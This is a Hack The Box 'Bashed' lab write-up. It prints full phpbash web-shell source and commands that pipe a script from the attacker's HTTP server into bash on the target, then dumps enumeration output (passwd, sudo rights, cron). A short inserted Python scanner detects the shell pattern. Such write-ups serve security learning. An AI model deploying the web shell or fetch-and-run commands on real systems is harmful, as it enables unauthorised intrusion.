Hackthebox - Bashed

 ·  ☕ 48 min read  ·  👤 Hong

Enumeration

nmap -sC -sV -oA initial 10.10.10.68

# Nmap 7.92 scan initiated Sat Jan 29 13:18:07 2022 as: nmap -sC -sV -oA initial 10.10.10.68
Nmap scan report for 10.10.10.68
Host is up (0.018s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Arrexel's Development Site

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jan 29 13:18:15 2022 -- 1 IP address (1 host up) scanned in 7.39 seconds

  • Ubuntu Xenial 16.04, inferred from the httpd version.

<?php
/* phpbash by Alexander Reid (Arrexel) */
if (ISSET($_POST['cmd'])) {
    $output = preg_split('/[\n]/', shell_exec($_POST['cmd']." 2>&1"));
    foreach ($output as $line) {
        echo htmlentities($line, ENT_QUOTES | ENT_HTML5, 'UTF-8') . "<br>";
    }
    die(); 
} else if (!empty($_FILES['file']['tmp_name']) && !empty($_POST['path'])) {
    $filename = $_FILES["file"]["name"];
    $path = $_POST['path'];
    if ($path != "/") {
        $path .= "/";
    } 
    if (move_uploaded_file($_FILES["file"]["tmp_name"], $path.$filename)) {
        echo htmlentities($filename) . " successfully uploaded to " . htmlentities($path);
    } else {
        echo "Error uploading " . htmlentities($filename);
    }
    die();
}
?>

<html>
    <head>
        <title></title>
        <style>
            html, body {
                max-width: 100%;
            }
        
            body {
                width: 100%;
                height: 100%;
                margin: 0;
                background: #000;
            }
            
            body, .inputtext {
                font-family: "Lucida Console", "Lucida Sans Typewriter", monaco, "Bitstream Vera Sans Mono", monospace;
                font-size: 14px;
                font-style: normal;
                font-variant: normal;
                font-weight: 400;
                line-height: 20px;
                overflow: hidden;
            }
        
            .console {
                width: 100%;
                height: 100%;
                margin: auto;
                position: absolute;
                color: #fff;
            }
            
            .output {
                width: auto;
                height: auto;
                position: absolute;
                overflow-y: scroll;
                top: 0;
                bottom: 30px;
                left: 5px;
                right: 0;
                line-height: 20px;
            }
                                 
            .input form {
                position: relative;
                margin-bottom: 0px;
            }
                     
            .username {
                height: 30px;
                width: auto;
                padding-left: 5px;
                line-height: 30px;
                float: left;
            }

            .input {
                border-top: 1px solid #333333;
                width: 100%;
                height: 30px;
                position: absolute;
                bottom: 0;
            }

            .inputtext {
                width: auto;
                height: 30px;
                bottom: 0px;
                margin-bottom: 0px;
                background: #000;
                border: 0;
                float: left;
                padding-left: 8px;
                color: #fff;
            }
            
            .inputtext:focus {
                outline: none;
            }

            ::-webkit-scrollbar {
                width: 12px;
            }

            ::-webkit-scrollbar-track {
                background: #101010;
            }

            ::-webkit-scrollbar-thumb {
                background: #303030; 
            }
        </style>
    </head>
    <body>
        <div class="console">
            <div class="output" id="output"></div>
            <div class="input" id="input">
                <form id="form" method="GET" onSubmit="sendCommand()">
                    <div class="username" id="username"></div>
                    <input class="inputtext" id="inputtext" type="text" name="cmd" autocomplete="off" autofocus>
                </form>
            </div>
        </div>
        <form id="upload" method="POST" style="display: none;">
            <input type="file" name="file" id="filebrowser" onchange='uploadFile()' />
        </form>
        <script type="text/javascript">
            var username = "";
            var hostname = "";
            var currentDir = "";
            var previousDir = "";
            var defaultDir = "";
            var commandHistory = [];
            var currentCommand = 0;
            var inputTextElement = document.getElementById('inputtext');
            var inputElement = document.getElementById("input");
            var outputElement = document.getElementById("output");
            var usernameElement = document.getElementById("username");
            var uploadFormElement = document.getElementById("upload");
            var fileBrowserElement = document.getElementById("filebrowser");
            getShellInfo();
            
            function getShellInfo() {
                var request = new XMLHttpRequest();
                
                request.onreadystatechange = function() {
                    if (request.readyState == XMLHttpRequest.DONE) {
                        var parsedResponse = request.responseText.split("<br>");
                        username = parsedResponse[0];
                        hostname = parsedResponse[1];
                        currentDir =  parsedResponse[2].replace(new RegExp("&sol;", "g"), "/");
                        defaultDir = currentDir;
                        usernameElement.innerHTML = "<div style='color: #ff0000; display: inline;'>"+username+"@"+hostname+"</div>:"+currentDir+"#";
                        updateInputWidth();
                    }
                };

                request.open("POST", "", true);
                request.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
                request.send("cmd=whoami; hostname; pwd");
            }
                        
            function sendCommand() {
                var request = new XMLHttpRequest();
                var command = inputTextElement.value;
                var originalCommand = command;
                var originalDir = currentDir;
                var cd = false;
                
                commandHistory.push(originalCommand);
                switchCommand(commandHistory.length);
                inputTextElement.value = "";

                var parsedCommand = command.split(" ");
                
                if (parsedCommand[0] == "cd") {
                    cd = true;
                    if (parsedCommand.length == 1) {
                        command = "cd "+defaultDir+"; pwd";
                    } else if (parsedCommand[1] == "-") {
                        command = "cd "+previousDir+"; pwd";
                    } else {
                        command = "cd "+currentDir+"; "+command+"; pwd";
                    }
                    
                } else if (parsedCommand[0] == "clear") {
                    outputElement.innerHTML = "";
                    return false;
                } else if (parsedCommand[0] == "upload") {
                    fileBrowserElement.click();
                    return false;
                } else {
                    command = "cd "+currentDir+"; " + command;
                }
                
                request.onreadystatechange = function() {
                    if (request.readyState == XMLHttpRequest.DONE) {
                        if (cd) {
                            var parsedResponse = request.responseText.split("<br>");
                            previousDir = currentDir;
                            currentDir = parsedResponse[0].replace(new RegExp("&sol;", "g"), "/");
                            outputElement.innerHTML += "<div style='color:#ff0000; float: left;'>"+username+"@"+hostname+"</div><div style='float: left;'>"+":"+originalDir+"# "+originalCommand+"</div><br>";
                            usernameElement.innerHTML = "<div style='color: #ff0000; display: inline;'>"+username+"@"+hostname+"</div>:"+currentDir+"#";
                        } else {
                            outputElement.innerHTML += "<div style='color:#ff0000; float: left;'>"+username+"@"+hostname+"</div><div style='float: left;'>"+":"+currentDir+"# "+originalCommand+"</div><br>" + request.responseText.replace(new RegExp("<br><br>$"), "<br>");
                            outputElement.scrollTop = outputElement.scrollHeight;
                        } 
                        updateInputWidth();
                    }
                };

                request.open("POST", "", true);
                request.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
                request.send("cmd="+encodeURIComponent(command));
                return false;
            }
            
            function uploadFile() {
                var formData = new FormData();
                formData.append('file', fileBrowserElement.files[0], fileBrowserElement.files[0].name);
                formData.append('path', currentDir);
                
                var request = new XMLHttpRequest();
                
                request.onreadystatechange = function() {
                    if (request.readyState == XMLHttpRequest.DONE) {
                        outputElement.innerHTML += request.responseText+"<br>";
                    }
                };

                request.open("POST", "", true);
                request.send(formData);
                outputElement.innerHTML += "<div style='color:#ff0000; float: left;'>"+username+"@"+hostname+"</div><div style='float: left;'>"+":"+currentDir+"# Uploading "+fileBrowserElement.files[0].name+"...</div><br>";
            }
            
            function updateInputWidth() {
                inputTextElement.style.width = inputElement.clientWidth - usernameElement.clientWidth - 15;
            }
            
            document.onkeydown = checkForArrowKeys;

            function checkForArrowKeys(e) {
                e = e || window.event;

                if (e.keyCode == '38') {
                    previousCommand();
                } else if (e.keyCode == '40') {
                    nextCommand();
                }
            }
            
            function previousCommand() {
                if (currentCommand != 0) {
                    switchCommand(currentCommand-1);
                }
            }
            
            function nextCommand() {
                if (currentCommand != commandHistory.length) {
                    switchCommand(currentCommand+1);
                }
            }
            
            function switchCommand(newCommand) {
                currentCommand = newCommand;

                if (currentCommand == commandHistory.length) {
                    inputTextElement.value = "";
                } else {
                    inputTextElement.value = commandHistory[currentCommand];
                    setTimeout(function(){ inputTextElement.selectionStart = inputTextElement.selectionEnd = 10000; }, 0);
                }
            }
            
            document.getElementById("form").addEventListener("submit", function(event){
                event.preventDefault()
            });
        </script>
    </body>
</html>
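
A defender-side check for the pattern in the phpbash handler above, as an added example that is not part of the original write-up or of phpbash: a heuristic Python scanner that flags PHP source in which request data reaches a shell-execution call or an upload destination. The function names, the sink list and the second sample are assumptions constructed for illustration; the first sample is a trimmed excerpt of the handler shown above.

```python
import re

# Request-controlled PHP superglobals.
SOURCES = re.compile(r"\$_(?:GET|POST|REQUEST|COOKIE|FILES)\b")
# PHP functions that pass a string to the OS shell (illustrative list, not exhaustive).
EXEC_SINKS = ("shell_exec", "exec", "system", "passthru", "popen", "proc_open")
# "$var = expr;" or "$var .= expr;" but not "==", "!=" or "=>".
ASSIGN = re.compile(r"(\$[A-Za-z_]\w*)\s*\.?=(?![=>])\s*([^;]*);")
VAR = re.compile(r"\$[A-Za-z_]\w*")

# Trimmed excerpt of the phpbash request handler shown above.
PHPBASH_HANDLER = r"""<?php
if (ISSET($_POST['cmd'])) {
    $output = preg_split('/[\n]/', shell_exec($_POST['cmd']." 2>&1"));
    die();
} else if (!empty($_FILES['file']['tmp_name']) && !empty($_POST['path'])) {
    $filename = $_FILES["file"]["name"];
    $path = $_POST['path'];
    if ($path != "/") {
        $path .= "/";
    }
    if (move_uploaded_file($_FILES["file"]["tmp_name"], $path.$filename)) {
        echo "uploaded";
    }
    die();
}
"""

# Constructed sample: fixed command, server-chosen upload destination.
HARDENED_UPLOAD = r"""<?php
$name = basename($_FILES['file']['name']);
$dest = '/var/uploads/' . bin2hex(random_bytes(16));
if (move_uploaded_file($_FILES['file']['tmp_name'], $dest)) {
    echo 'stored';
}
$uptime = shell_exec('uptime');
"""


def call_args(src, open_paren):
    """Return the top-level arguments of the call whose '(' is at open_paren."""
    args, depth, quote, start = [], 0, None, open_paren + 1
    i = open_paren
    while i < len(src):
        ch = src[i]
        if quote:
            if ch == "\\":
                i += 1              # skip the escaped character
            elif ch == quote:
                quote = None
        elif ch in "'\"":
            quote = ch
        elif ch in "([":
            depth += 1
        elif ch in ")]":
            depth -= 1
            if depth == 0:          # closing paren of the call itself
                args.append(src[start:i].strip())
                return args
        elif ch == "," and depth == 1:
            args.append(src[start:i].strip())
            start = i + 1
        i += 1
    return args                     # unbalanced input: return what was parsed


def tainted_vars(src):
    """Variables assigned, directly or transitively, from request data."""
    tainted, changed = set(), True
    while changed:                  # repeat until no new variable is added
        changed = False
        for name, expr in ASSIGN.findall(src):
            if name not in tainted and (
                SOURCES.search(expr) or any(v in tainted for v in VAR.findall(expr))
            ):
                tainted.add(name)
                changed = True
    return tainted


def scan_php(src):
    """Return (line, sink, reason) findings for one PHP source string."""
    tainted = tainted_vars(src)

    def is_tainted(expr):
        return bool(SOURCES.search(expr)) or any(v in tainted for v in VAR.findall(expr))

    findings = []
    for m in re.finditer(r"\b(\w+)\s*\(", src):
        name = m.group(1).lower()   # PHP function names are case-insensitive
        if name not in EXEC_SINKS and name != "move_uploaded_file":
            continue
        args = call_args(src, m.end() - 1)
        line = src.count("\n", 0, m.start()) + 1
        if name in EXEC_SINKS and args and is_tainted(args[0]):
            findings.append((line, name, "request data reaches a shell command"))
        elif name == "move_uploaded_file" and len(args) == 2 and is_tainted(args[1]):
            findings.append((line, name, "upload destination built from request data"))
    return findings


if __name__ == "__main__":
    for label, sample in (("phpbash", PHPBASH_HANDLER), ("hardened", HARDENED_UPLOAD)):
        print(label, scan_php(sample))
```

The scanner is a triage heuristic: it does not model sanitizers, includes or dynamic function names, so a hit is a prompt for manual review of the file and a clean result is not proof of absence.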

Directory Enum

gobuster dir -u http://10.10.10.68 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

/images               (Status: 301) [Size: 311] [--> http://10.10.10.68/images/]
/uploads              (Status: 301) [Size: 312] [--> http://10.10.10.68/uploads/]
/php                  (Status: 301) [Size: 308] [--> http://10.10.10.68/php/]    
/css                  (Status: 301) [Size: 308] [--> http://10.10.10.68/css/]    
/dev                  (Status: 301) [Size: 308] [--> http://10.10.10.68/dev/]    
/js                   (Status: 301) [Size: 307] [--> http://10.10.10.68/js/]     
/fonts                (Status: 301) [Size: 310] [--> http://10.10.10.68/fonts/]

Exploitation

git clone https://github.com/rebootuser/LinEnum

python -m SimpleHTTPServer 80  # On the attacking machine

# In 10.10.10.68/dev/phpbash.php

curl 10.10.14.28/LinEnum.sh | bash

which curl # No curl

which wget # wget is available

wget 10.10.14.28/LinEnum.sh

cd /dev/shm

wget 10.10.14.28/LinEnum.sh

bash LinEnum.sh # Run the script

#########################################################
# Local Linux Enumeration & Privilege Escalation Script #
#########################################################
# www.rebootuser.com
# version 0.982

[-] Debug Info
[+] Thorough tests = Disabled


Scan started at:
Sat Jan 29 11:39:45 PST 2022


### SYSTEM ##############################################
[-] Kernel information:
Linux bashed 4.4.0-62-generic #83-Ubuntu SMP Wed Jan 18 14:10:15 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux


[-] Kernel information (continued):
Linux version 4.4.0-62-generic (buildd@lcy01-30) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.4) ) #83-Ubuntu SMP Wed Jan 18 14:10:15 UTC 2017


[-] Specific release information:
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=16.04
DISTRIB_CODENAME=xenial
DISTRIB_DESCRIPTION="Ubuntu 16.04.2 LTS"
NAME="Ubuntu"
VERSION="16.04.2 LTS (Xenial Xerus)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 16.04.2 LTS"
VERSION_ID="16.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"
VERSION_CODENAME=xenial
UBUNTU_CODENAME=xenial


[-] Hostname:
bashed


### USER/GROUP ##########################################
[-] Current user/group info:
uid=33(www-data) gid=33(www-data) groups=33(www-data)


[-] Users that have previously logged onto the system:
Username Port From Latest
arrexel tty1 Sat Dec 23 20:20:46 -0800 2017


[-] Who else is logged on:
11:39:45 up 1:23, 0 users, load average: 0.00, 0.01, 0.02
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT


[-] Group memberships:
uid=0(root) gid=0(root) groups=0(root)
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=100(systemd-timesync) gid=102(systemd-timesync) groups=102(systemd-timesync)
uid=101(systemd-network) gid=103(systemd-network) groups=103(systemd-network)
uid=102(systemd-resolve) gid=104(systemd-resolve) groups=104(systemd-resolve)
uid=103(systemd-bus-proxy) gid=105(systemd-bus-proxy) groups=105(systemd-bus-proxy)
uid=104(syslog) gid=108(syslog) groups=108(syslog),4(adm)
uid=105(_apt) gid=65534(nogroup) groups=65534(nogroup)
uid=106(messagebus) gid=110(messagebus) groups=110(messagebus)
uid=107(uuidd) gid=111(uuidd) groups=111(uuidd)
uid=1000(arrexel) gid=1000(arrexel) groups=1000(arrexel),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),114(lpadmin),115(sambashare)
uid=1001(scriptmanager) gid=1001(scriptmanager) groups=1001(scriptmanager)


[-] It looks like we have some admin users:
uid=104(syslog) gid=108(syslog) groups=108(syslog),4(adm)
uid=1000(arrexel) gid=1000(arrexel) groups=1000(arrexel),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),114(lpadmin),115(sambashare)


[-] Contents of /etc/passwd:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
arrexel:x:1000:1000:arrexel,,,:/home/arrexel:/bin/bash
scriptmanager:x:1001:1001:,,,:/home/scriptmanager:/bin/bash


[-] Super user account(s):
root


[+] We can sudo without supplying a password!
Matching Defaults entries for www-data on bashed:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on bashed:
(scriptmanager : scriptmanager) NOPASSWD: ALL


[-] Accounts that have recently used sudo:
/home/arrexel/.sudo_as_admin_successful


[-] Are permissions on /home directories lax:
total 16K
drwxr-xr-x 4 root root 4.0K Dec 4 2017 .
drwxr-xr-x 23 root root 4.0K Dec 4 2017 ..
drwxr-xr-x 4 arrexel arrexel 4.0K Dec 4 2017 arrexel
drwxr-xr-x 3 scriptmanager scriptmanager 4.0K Dec 4 2017 scriptmanager


### ENVIRONMENTAL #######################################
[-] Environment information:
APACHE_PID_FILE=/var/run/apache2/apache2.pid
APACHE_RUN_USER=www-data
APACHE_LOG_DIR=/var/log/apache2
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
PWD=/dev/shm
APACHE_RUN_GROUP=www-data
LANG=C
SHLVL=1
APACHE_LOCK_DIR=/var/lock/apache2
APACHE_RUN_DIR=/var/run/apache2
_=/usr/bin/env


[-] Path information:
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
drwxr-xr-x 2 root root 4096 Dec 4 2017 /bin
drwxr-xr-x 2 root root 4096 Dec 4 2017 /sbin
drwxr-xr-x 2 root root 20480 Dec 4 2017 /usr/bin
drwxr-xr-x 2 root root 4096 Feb 15 2017 /usr/local/bin
drwxr-xr-x 2 root root 4096 Feb 15 2017 /usr/local/sbin
drwxr-xr-x 2 root root 4096 Dec 4 2017 /usr/sbin


[-] Available shells:
# /etc/shells: valid login shells
/bin/sh
/bin/dash
/bin/bash
/bin/rbash


[-] Current umask value:
0022
u=rwx,g=rx,o=rx


[-] umask value as specified in /etc/login.defs:
UMASK 022


[-] Password and storage information:
PASS_MAX_DAYS 99999
PASS_MIN_DAYS 0
PASS_WARN_AGE 7
ENCRYPT_METHOD SHA512


### JOBS/TASKS ##########################################
[-] Cron jobs:
-rw-r--r-- 1 root root 722 Apr 5 2016 /etc/crontab

/etc/cron.d:
total 20
drwxr-xr-x 2 root root 4096 Dec 4 2017 .
drwxr-xr-x 89 root root 4096 Dec 4 2017 ..
-rw-r--r-- 1 root root 102 Apr 5 2016 .placeholder
-rw-r--r-- 1 root root 670 Mar 1 2016 php
-rw-r--r-- 1 root root 191 Dec 4 2017 popularity-contest

/etc/cron.daily:
total 48
drwxr-xr-x 2 root root 4096 Dec 4 2017 .
drwxr-xr-x 89 root root 4096 Dec 4 2017 ..
-rw-r--r-- 1 root root 102 Apr 5 2016 .placeholder
-rwxr-xr-x 1 root root 539 Apr 5 2016 apache2
-rwxr-xr-x 1 root root 1474 Jan 17 2017 apt-compat
-rwxr-xr-x 1 root root 355 May 22 2012 bsdmainutils
-rwxr-xr-x 1 root root 1597 Nov 26 2015 dpkg
-rwxr-xr-x 1 root root 372 May 5 2015 logrotate
-rwxr-xr-x 1 root root 1293 Nov 6 2015 man-db
-rwxr-xr-x 1 root root 435 Nov 17 2014 mlocate
-rwxr-xr-x 1 root root 249 Nov 12 2015 passwd
-rwxr-xr-x 1 root root 3449 Feb 26 2016 popularity-contest

/etc/cron.hourly:
total 12
drwxr-xr-x 2 root root 4096 Dec 4 2017 .
drwxr-xr-x 89 root root 4096 Dec 4 2017 ..
-rw-r--r-- 1 root root 102 Apr 5 2016 .placeholder

/etc/cron.monthly:
total 12
drwxr-xr-x 2 root root 4096 Dec 4 2017 .
drwxr-xr-x 89 root root 4096 Dec 4 2017 ..
-rw-r--r-- 1 root root 102 Apr 5 2016 .placeholder

/etc/cron.weekly:
total 20
drwxr-xr-x 2 root root 4096 Dec 4 2017 .
drwxr-xr-x 89 root root 4096 Dec 4 2017 ..
-rw-r--r-- 1 root root 102 Apr 5 2016 .placeholder
-rwxr-xr-x 1 root root 86 Apr 13 2016 fstrim
-rwxr-xr-x 1 root root 771 Nov 6 2015 man-db


[-] Crontab contents:
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#


[-] Anything interesting in /var/spool/cron/crontabs:
total 0
d????????? ? ? ? ? ? .
d????????? ? ? ? ? ? ..
-????????? ? ? ? ? ? root


[-] Systemd timers:
NEXT LEFT LAST PASSED UNIT ACTIVATES
Sat 2022-01-29 18:09:40 PST 6h left Sat 2022-01-29 10:15:56 PST 1h 23min ago apt-daily.timer apt-daily.service
Sun 2022-01-30 10:30:56 PST 22h left Sat 2022-01-29 10:30:56 PST 1h 8min ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service

2 timers listed.
Enable thorough tests to see inactive timers


### NETWORKING ##########################################
[-] Network and IP info:
ens33 Link encap:Ethernet HWaddr 00:50:56:b9:89:fa
inet addr:10.10.10.68 Bcast:10.10.10.255 Mask:255.255.255.255
inet6 addr: fe80::250:56ff:feb9:89fa/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:205649 errors:0 dropped:69 overruns:0 frame:0
TX packets:201739 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:32067305 (32.0 MB) TX bytes:99906403 (99.9 MB)

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:26792 errors:0 dropped:0 overruns:0 frame:0
TX packets:26792 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1
RX bytes:1984408 (1.9 MB) TX bytes:1984408 (1.9 MB)


[-] ARP history:
? (10.10.10.2) at 00:50:56:b9:2e:45 [ether] on ens33


[-] Default route:
default 10.10.10.2 0.0.0.0 UG 0 0 0 ens33


[-] Listening TCP:
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp6 0 0 :::80 :::* LISTEN -


[-] Listening UDP:
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name


### SERVICES #############################################
[-] Running processes:
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.5 37808 5788 ? Ss 10:15 0:01 /sbin/init noprompt
root 2 0.0 0.0 0 0 ? S 10:15 0:00 [kthreadd]
root 3 0.0 0.0 0 0 ? S 10:15 0:00 [ksoftirqd/0]
root 5 0.0 0.0 0 0 ? S< 10:15 0:00 [kworker/0:0H]
root 7 0.0 0.0 0 0 ? S 10:15 0:00 [rcu_sched]
root 8 0.0 0.0 0 0 ? S 10:15 0:00 [rcu_bh]
root 9 0.0 0.0 0 0 ? S 10:15 0:00 [migration/0]
root 10 0.0 0.0 0 0 ? S 10:15 0:00 [watchdog/0]
root 11 0.0 0.0 0 0 ? S 10:15 0:00 [kdevtmpfs]
root 12 0.0 0.0 0 0 ? S< 10:15 0:00 [netns]
root 13 0.0 0.0 0 0 ? S< 10:15 0:00 [perf]
root 14 0.0 0.0 0 0 ? S 10:15 0:00 [khungtaskd]
root 15 0.0 0.0 0 0 ? S< 10:15 0:00 [writeback]
root 16 0.0 0.0 0 0 ? SN 10:15 0:00 [ksmd]
root 17 0.0 0.0 0 0 ? SN 10:15 0:00 [khugepaged]
root 18 0.0 0.0 0 0 ? S< 10:15 0:00 [crypto]
root 19 0.0 0.0 0 0 ? S< 10:15 0:00 [kintegrityd]
root 20 0.0 0.0 0 0 ? S< 10:15 0:00 [bioset]
root 21 0.0 0.0 0 0 ? S< 10:15 0:00 [kblockd]
root 22 0.0 0.0 0 0 ? S< 10:15 0:00 [ata_sff]
root 23 0.0 0.0 0 0 ? S< 10:15 0:00 [md]
root 24 0.0 0.0 0 0 ? S< 10:15 0:00 [devfreq_wq]
root 26 0.0 0.0 0 0 ? S 10:15 0:00 [kworker/0:1]
root 28 0.0 0.0 0 0 ? S 10:15 0:00 [kswapd0]
root 29 0.0 0.0 0 0 ? S< 10:15 0:00 [vmstat]
root 30 0.0 0.0 0 0 ? S 10:15 0:00 [fsnotify_mark]
root 31 0.0 0.0 0 0 ? S 10:15 0:00 [ecryptfs-kthrea]
root 47 0.0 0.0 0 0 ? S< 10:15 0:00 [kthrotld]
root 48 0.0 0.0 0 0 ? S< 10:15 0:00 [acpi_thermal_pm]
root 49 0.0 0.0 0 0 ? S< 10:15 0:00 [bioset]
root 50 0.0 0.0 0 0 ? S< 10:15 0:00 [bioset]
root 51 0.0 0.0 0 0 ? S< 10:15 0:00 [bioset]
root 52 0.0 0.0 0 0 ? S< 10:15 0:00 [bioset]
root 53 0.0 0.0 0 0 ? S< 10:15 0:00 [bioset]
root 54 0.0 0.0 0 0 ? S< 10:15 0:00 [bioset]
root 55 0.0 0.0 0 0 ? S< 10:15 0:00 [bioset]
root 56 0.0 0.0 0 0 ? S< 10:15 0:00 [bioset]
root 57 0.0 0.0 0 0 ? S< 10:15 0:00 [bioset]
root 58 0.0 0.0 0 0 ? S< 10:15 0:00 [bioset]
root 59 0.0 0.0 0 0 ? S< 10:15 0:00 [bioset]
root 60 0.0 0.0 0 0 ? S< 10:15 0:00 [bioset]
root 61 0.0 0.0 0 0 ? S< 10:15 0:00 [bioset]
root 62 0.0 0.0 0 0 ? S< 10:15 0:00 [bioset]
root 63 0.0 0.0 0 0 ? S< 10:15 0:00 [bioset]
root 64 0.0 0.0 0 0 ? S< 10:15 0:00 [bioset]
root 65 0.0 0.0 0 0 ? S< 10:15 0:00 [bioset]
root 66 0.0 0.0 0 0 ? S< 10:15 0:00 [bioset]
root 67 0.0 0.0 0 0 ? S< 10:15 0:00 [bioset]
root 68 0.0 0.0 0 0 ? S< 10:15 0:00 [bioset]
root 69 0.0 0.0 0 0 ? S< 10:15 0:00 [bioset]
root 70 0.0 0.0 0 0 ? S< 10:15 0:00 [bioset]
root 71 0.0 0.0 0 0 ? S< 10:15 0:00 [bioset]
root 72 0.0 0.0 0 0 ? S< 10:15 0:00 [bioset]
root 73 0.0 0.0 0 0 ? S 10:15 0:00 [scsi_eh_0]
root 74 0.0 0.0 0 0 ? S< 10:15 0:00 [scsi_tmf_0]
root 75 0.0 0.0 0 0 ? S 10:15 0:00 [scsi_eh_1]
root 76 0.0 0.0 0 0 ? S< 10:15 0:00 [scsi_tmf_1]
root 77 0.0 0.0 0 0 ? S 10:15 0:00 [kworker/u256:2]
root 83 0.0 0.0 0 0 ? S< 10:15 0:00 [ipv6_addrconf]
root 97 0.0 0.0 0 0 ? S< 10:15 0:00 [bioset]
root 98 0.0 0.0 0 0 ? S< 10:15 0:00 [deferwq]
root 99 0.0 0.0 0 0 ? S< 10:15 0:00 [charger_manager]
root 100 0.0 0.0 0 0 ? S 10:15 0:00 [kworker/u256:4]
root 157 0.0 0.0 0 0 ? S 10:15 0:00 [scsi_eh_2]
root 158 0.0 0.0 0 0 ? S< 10:15 0:00 [scsi_tmf_2]
root 159 0.0 0.0 0 0 ? S< 10:15 0:00 [vmw_pvscsi_wq_2]
root 160 0.0 0.0 0 0 ? S< 10:15 0:00 [bioset]
root 173 0.0 0.0 0 0 ? S< 10:15 0:00 [kpsmoused]
root 178 0.0 0.0 0 0 ? S< 10:15 0:00 [ttm_swap]
root 201 0.0 0.0 0 0 ? S 10:15 0:00 [jbd2/sda1-8]
root 202 0.0 0.0 0 0 ? S< 10:15 0:00 [ext4-rsv-conver]
root 237 0.0 0.2 28332 2852 ? Ss 10:15 0:00 /lib/systemd/systemd-journald
root 243 0.0 0.0 0 0 ? S< 10:15 0:00 [kworker/0:1H]
